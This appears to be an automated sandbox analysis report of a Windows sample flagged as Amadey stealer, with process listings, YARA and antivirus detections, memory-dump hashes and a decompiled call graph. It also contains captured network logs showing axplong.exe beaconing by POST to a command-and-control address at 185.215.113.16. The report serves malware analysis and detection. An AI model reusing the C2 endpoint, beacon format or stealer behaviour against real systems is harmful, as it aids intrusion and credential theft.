                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:06:02.577826977 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:06:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    53192.168.2.462812185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:06:02.689042091 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:06:03.398214102 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:06:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:06:03.427120924 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:06:03.654206991 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:06:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    54192.168.2.462813185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:06:03.815668106 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:06:04.521752119 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:06:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    55192.168.2.462814185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:06:04.531641006 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:06:05.255327940 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:06:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    56192.168.2.462815185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:06:05.378062010 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:06:06.108616114 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:06:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:06:06.803221941 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:06:07.038024902 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:06:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    57192.168.2.462816185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:06:07.159190893 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:06:07.860096931 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:06:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    58192.168.2.462817185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:06:07.870531082 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:06:08.576803923 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:06:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    59192.168.2.462818185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:06:08.689546108 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:06:09.412343979 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:06:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:13:04:01
                                                                    Start date:27/09/2024
                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                                    Imagebase:0xed0000
                                                                    File size:1'949'184 bytes
                                                                    MD5 hash:572146DA15EDF1DAAC1B337A71D9A1F7
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1742866019.0000000005180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1783849265.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:1
                                                                    Start time:13:04:04
                                                                    Start date:27/09/2024
                                                                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                                                                    Imagebase:0xb20000
                                                                    File size:1'949'184 bytes
                                                                    MD5 hash:572146DA15EDF1DAAC1B337A71D9A1F7
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1812692273.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1771741523.0000000004920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 53%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:13:04:04
                                                                    Start date:27/09/2024
                                                                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    Imagebase:0xb20000
                                                                    File size:1'949'184 bytes
                                                                    MD5 hash:572146DA15EDF1DAAC1B337A71D9A1F7
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1772376419.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1813406382.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:6
                                                                    Start time:13:05:00
                                                                    Start date:27/09/2024
                                                                    Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    Imagebase:0xb20000
                                                                    File size:1'949'184 bytes
                                                                    MD5 hash:572146DA15EDF1DAAC1B337A71D9A1F7
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2324708370.0000000005190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Reset < >
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1787945297.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_53a0000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: |"_O
                                                                      • API String ID: 0-3760475948
                                                                      • Opcode ID: 5eac684a00020fced1d357a4306efd9698cb9e94f3abec6370dc582b03b04f54
                                                                      • Instruction ID: 9c4379a35b56e276bd986cc7c96a408278f5d5761c2c7c6387ced65a7b147eda
                                                                      • Opcode Fuzzy Hash: 5eac684a00020fced1d357a4306efd9698cb9e94f3abec6370dc582b03b04f54
                                                                      • Instruction Fuzzy Hash: 1011BFEF14C210BEA14AC5866F9C9F76A6FE5C77307318427F44795E02E2E90A4A9132
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1787945297.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_53a0000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: |"_O
                                                                      • API String ID: 0-3760475948
                                                                      • Opcode ID: 81c5a88bf09b44821b16d80214e70eeed0aef01c82dfb094417acb406756282e
                                                                      • Instruction ID: b3c81773f76d7f17f7a841d9a9b5f5a4eae9ad0dbbfca867a151883025df21fd
                                                                      • Opcode Fuzzy Hash: 81c5a88bf09b44821b16d80214e70eeed0aef01c82dfb094417acb406756282e
                                                                      • Instruction Fuzzy Hash: 541101EF04C214BEA146C5866BAD9F66A6FE5C7330B31842BF84795E02E2980A495132
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1787945297.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_53a0000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: |"_O
                                                                      • API String ID: 0-3760475948
                                                                      • Opcode ID: e1939e5f54ea8676d5dba65c92187992c0bbe7ea95621e07b249cec24086b0fb
                                                                      • Instruction ID: 8122c39b601c235c455fd10ac451adb701e1e3b23faaa3163da8dad0ec0d2a90
                                                                      • Opcode Fuzzy Hash: e1939e5f54ea8676d5dba65c92187992c0bbe7ea95621e07b249cec24086b0fb
                                                                      • Instruction Fuzzy Hash: D41148EF08C210BEA54B85956B9D8F66F6FF5D7330731847AF447A1E02E2D90B495131
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1787945297.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_53a0000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: |"_O
                                                                      • API String ID: 0-3760475948
                                                                      • Opcode ID: 8fcc641f1d1b0fe6d6da4aabba6e8e7ce555b5c3f5e1c022828b55314d23601d
                                                                      • Instruction ID: 99843b88903f8d58e306cbe78748afdf593990d27005e1db31bdc21318212f7b
                                                                      • Opcode Fuzzy Hash: 8fcc641f1d1b0fe6d6da4aabba6e8e7ce555b5c3f5e1c022828b55314d23601d
                                                                      • Instruction Fuzzy Hash: 081126EF04C210BEA54BC5866BAD9F67EAFE5C7330B318427F447A5E02E2D91B495132
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1787945297.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_53a0000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: |"_O
                                                                      • API String ID: 0-3760475948
                                                                      • Opcode ID: 143773cbe195ec9a3ad08f28150dbd9a201299d668eabc074819f7bac34a8e19
                                                                      • Instruction ID: a34f9dd747f08826e3b0f95590be21df0cbe4bf8b291614ff3777498afe1ce9f
                                                                      • Opcode Fuzzy Hash: 143773cbe195ec9a3ad08f28150dbd9a201299d668eabc074819f7bac34a8e19
                                                                      • Instruction Fuzzy Hash: CA0126EF08C210BEA54AC1966BECAF66E6FF5D77307314426F447A5E02A2980E4A6071
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1787945297.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_53a0000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: |"_O
                                                                      • API String ID: 0-3760475948
                                                                      • Opcode ID: ef0943a73957c1752709a4342832d311491d8058986ce1b41fe2cf5de7fa54ba
                                                                      • Instruction ID: 81c0bf44eb9d4a28c630a91a5aecb4493ecf7330169e9e92ed52fa159dbf1145
                                                                      • Opcode Fuzzy Hash: ef0943a73957c1752709a4342832d311491d8058986ce1b41fe2cf5de7fa54ba
                                                                      • Instruction Fuzzy Hash: E50145EF08C210BEA146C1956BAC9F66EAFE1C73707318427F403A1E42E2880B495131
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1787945297.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_53a0000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0c5d6eb92079a5b21a9ed8381ef983f34dfc7bfae6bffbccfc172f2c8a986a5c
                                                                      • Instruction ID: 476ca6e6f5d75c4d5f90d7b4add347fbaf0f30cb23bad192ae7933d0d953ef5c
                                                                      • Opcode Fuzzy Hash: 0c5d6eb92079a5b21a9ed8381ef983f34dfc7bfae6bffbccfc172f2c8a986a5c
                                                                      • Instruction Fuzzy Hash: 930190DF54C2A05DA64BC6615EAC6F22F2EE5C72303354467F44397E52B14C1A4D9272
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1787945297.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_53a0000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 784d18cc4e1016c3245e5467474a4ccfce2cb8d5d466ec091d6a6e380a2008c6
                                                                      • Instruction ID: 3d8b66c678ec6a0a8e70dc716c583796809e81030656395e2c500a9a85a6ae27
                                                                      • Opcode Fuzzy Hash: 784d18cc4e1016c3245e5467474a4ccfce2cb8d5d466ec091d6a6e380a2008c6
                                                                      • Instruction Fuzzy Hash: C901DFEF08C220BEA146C1926AAC5F2BB6EF5C3230731442AF44390D42A7981B695132

                                                                      Execution Graph

                                                                      Execution Coverage:7.7%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:6.5%
                                                                      Total number of Nodes:541
                                                                      Total number of Limit Nodes:33
                                                                      execution_graph 12525 b56974 12526 b56982 12525->12526 12527 b5698c 12525->12527 12528 b568bd 2 API calls 12527->12528 12529 b569a6 __freea 12528->12529 12205 b286b0 12206 b286b6 12205->12206 12207 b286d6 12206->12207 12208 b566e7 2 API calls 12206->12208 12209 b286d0 12208->12209 12336 b2e410 12337 b2e435 12336->12337 12339 b2e419 12336->12339 12339->12337 12340 b2e270 12339->12340 12341 b2e280 __dosmaperr 12340->12341 12342 b58979 2 API calls 12341->12342 12343 b2e2bd std::_Xinvalid_argument 12342->12343 12344 b2e435 12343->12344 12345 b2e270 2 API calls 12343->12345 12344->12339 12345->12343 12451 b2dfd0 recv 12452 b2e032 recv 12451->12452 12453 b2e067 recv 12452->12453 12454 b2e0a1 12453->12454 12455 b2e1c3 12454->12455 12456 b3c5dc GetSystemTimePreciseAsFileTime 12454->12456 12457 b2e1fe 12456->12457 12458 b3c19a 7 API calls 12457->12458 12459 b2e268 12458->12459 11973 b31dd0 11977 b31e6b shared_ptr __dosmaperr 11973->11977 11974 b31e78 11976 b2e440 5 API calls 11974->11976 11975 b32936 shared_ptr std::_Xinvalid_argument 11976->11975 11977->11974 11977->11975 11988 b58979 11977->11988 11979 b32265 shared_ptr 11979->11974 11979->11975 11992 b566e7 11979->11992 11981 b3268b shared_ptr __dosmaperr 11981->11975 11982 b58979 2 API calls 11981->11982 11983 b32759 11982->11983 11983->11974 11983->11975 11984 b327d1 11983->11984 11996 b2e440 11984->11996 11986 b32843 11986->11975 12012 b25df0 11986->12012 11989 b58994 11988->11989 12019 b586d7 11989->12019 11991 b5899e 11991->11979 11993 b566f3 11992->11993 11995 b566fd __cftof __dosmaperr 11993->11995 12105 b56670 11993->12105 11995->11981 11997 b2e489 11996->11997 12128 b2bd60 11997->12128 11999 b2e9a9 shared_ptr 11999->11986 12000 b2e711 12000->11999 12001 b2e440 5 API calls 12000->12001 12003 b2f696 12001->12003 12002 b2f892 shared_ptr 12002->11986 12003->12002 12004 b2e440 5 API calls 12003->12004 12006 b2f973 12004->12006 12005 b2fa45 shared_ptr 12005->11986 12006->12005 12007 b2e440 5 API calls 12006->12007 12009 b3054c 12007->12009 12008 b30790 shared_ptr 12008->11986 12009->12008 12010 b2e440 5 API calls 12009->12010 12011 b311f9 12010->12011 12014 b25e28 12012->12014 12013 b25f0e shared_ptr 12013->11975 12014->12013 12015 b26060 RegOpenKeyExA 12014->12015 12016 b2645a shared_ptr 12015->12016 12018 b260b3 __cftof 12015->12018 12016->11975 12017 b26153 RegEnumValueW 12017->12018 12018->12016 12018->12017 12020 b586e9 12019->12020 12024 b586fe __cftof __dosmaperr 12020->12024 12025 b5683a 12020->12025 12023 b5872e 12023->12024 12031 b58925 12023->12031 12024->11991 12026 b5685a 12025->12026 12030 b56851 12025->12030 12026->12030 12037 b5b4bb 12026->12037 12030->12023 12032 b58962 12031->12032 12033 b58932 12031->12033 12098 b5d2e9 12032->12098 12035 b58941 __fassign 12033->12035 12093 b5d30d 12033->12093 12035->12023 12038 b56890 12037->12038 12039 b5b4ce 12037->12039 12041 b5b4e8 12038->12041 12039->12038 12045 b5f46b 12039->12045 12042 b5b510 12041->12042 12043 b5b4fb 12041->12043 12042->12030 12043->12042 12076 b5e571 12043->12076 12047 b5f477 __cftof 12045->12047 12046 b5f4c6 12046->12038 12047->12046 12050 b58aaf 12047->12050 12049 b5f4eb 12051 b58ab4 __cftof 12050->12051 12054 b58abf 12051->12054 12059 b5d4f4 12051->12059 12056 b5651d 12054->12056 12055 b58af2 __cftof __dosmaperr 12055->12049 12064 b563f7 12056->12064 12061 b5d500 __cftof 12059->12061 12060 b5d55c __cftof __dosmaperr 12060->12054 12061->12060 12062 b5651d __cftof 2 API calls 12061->12062 12063 b5d6ee __cftof __dosmaperr 12062->12063 12063->12054 12065 b56405 __cftof 12064->12065 12066 b56450 12065->12066 12069 b5645b 12065->12069 12066->12055 12074 b5a1c2 GetPEB 12069->12074 12071 b56465 12072 b5646a GetPEB 12071->12072 12073 b5647a __cftof 12071->12073 12072->12073 12075 b5a1dc __cftof 12074->12075 12075->12071 12077 b5e57b 12076->12077 12080 b5e489 12077->12080 12079 b5e581 12079->12042 12084 b5e495 __cftof __freea 12080->12084 12081 b5e4b6 12081->12079 12082 b58aaf __cftof 2 API calls 12083 b5e528 12082->12083 12085 b5e564 12083->12085 12089 b5a5ee 12083->12089 12084->12081 12084->12082 12085->12079 12090 b5a611 12089->12090 12091 b58aaf __cftof 2 API calls 12090->12091 12092 b5a687 12091->12092 12094 b5683a __cftof 2 API calls 12093->12094 12095 b5d32a 12094->12095 12097 b5d33a 12095->12097 12102 b5f07f 12095->12102 12097->12035 12099 b5d2f4 12098->12099 12100 